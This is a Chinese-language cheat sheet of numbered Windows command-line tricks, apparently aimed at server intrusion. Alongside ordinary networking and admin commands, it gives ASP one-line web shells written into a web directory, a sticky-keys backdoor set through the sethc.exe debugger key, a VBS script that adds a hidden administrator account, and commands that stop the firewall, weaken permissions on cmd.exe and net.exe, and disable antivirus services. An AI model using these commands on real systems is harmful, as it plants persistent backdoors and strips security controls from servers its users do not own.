1:CMD下修改IP地址 c:\netsh c:\netsh>interface c:\netsh\interface>ip c:\netsh\interface\ip>dump 显示配置情况 netsh -c interface ip dump >c:\ip.txt netsh interface ip dump >c:\ip.txt netsh -f c:\ip.txt
2:tasklist /svc 任务列表 3:taskkill TASKKILL /F /IM notepad.exe /IM mspaint.exe 4:systeminfo 显示系统详细信息 set 系统变量 5:shutdown -r -a 6:iisreset /reboot 7:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t reg_sz /d C:\WINDOWS\system32\taskmgr.exe /f 8:ntsd -c q -p PID 强制结束进程 9:syskey 增强密码安全性 10:net stop sharedaccess /y net stop alg /y 关闭防火墙 11:cacls c:\windows\system32\net.exe /t /e /c /G everyone:F 设置权限 cacls c:\windows\system32\cmd.exe /e /c /P guest:F 12:禁用cmd Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System] "DisableCMD"=dword:00000001
13:加密cmd [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun ---------------------- title
set pass=0 set times=0 echo
:start set /p pass=Please input the password: if %pass%==yourpass goto ok if %times%==0 goto end set /A times=%times%-1 :end exit cls :ok title ===================== 14:net view 查看工作组的电脑 15:tftp -i 192.168.1.88 get 1.txt ftp传输文件 端口udp69 16:netstat -nab 端口详情 17:echo ^<^%eval request(chr(35))%^> >d:\web\ma.asp echo ^<^%execute request(a)%^> 写一句话 18:msc lusrmgr.msc-本机用户和组 gpedit.msc--组策略 secpol.msc 本地策略 services.msc 服务 19:regsvr32 1、卸载wscript.shell对象 在cmd下运行:regsvr32 WSHom.Ocx /u 2、卸载FSO对象 在cmd下运行:regsvr32.exe scrrun.dll /u 3、卸载stream对象 在cmd下运行: regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll" 4:禁止使用Shell.Application组件 regsvr32.exe shell32.dll /u
恢复的话,去掉/u就行了 /s 安静模式 20:vbs加账号 ---------------------------------------------- set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","webadmin") od.SetPassword "pass" od.SetInfo Set of=GetObject(os&"/webadmin",user) oe.add os&"/webadmin" ------------------------------------------------- 21:vbs列网站目录 ---------------------------------------------------- Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsNumeric(obj3w.Name) Then sServerName=Obj3w.ServerComment Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root") ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If Next WScript.Echo ListAllWeb Set ObjService=Nothing WScript.Quit
--------------------------------------------------------- 22:arp -a arp -s 192.168.1.1 00-1a-a2-86-01-80 23:tracert 192.168.1.1 路由跟踪 24:sc 配置服务 sc getkeyname "Rising Process Communication Center" RsCCenter sc getkeyname "Rising RealTime Monitor" RsRavMon sc query servername sc config RsCCenter start= DEMAND DISABLED AUTO sc config RsRavMon start= DEMAND 25: regedit读3389端口 regedit /e port.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" 然后 type port.reg | find "PortNumber" 26:mstsc /console /v:ip 端口 登录超过最大连接数 mstsc /console /v:192.168.1.88:2008
|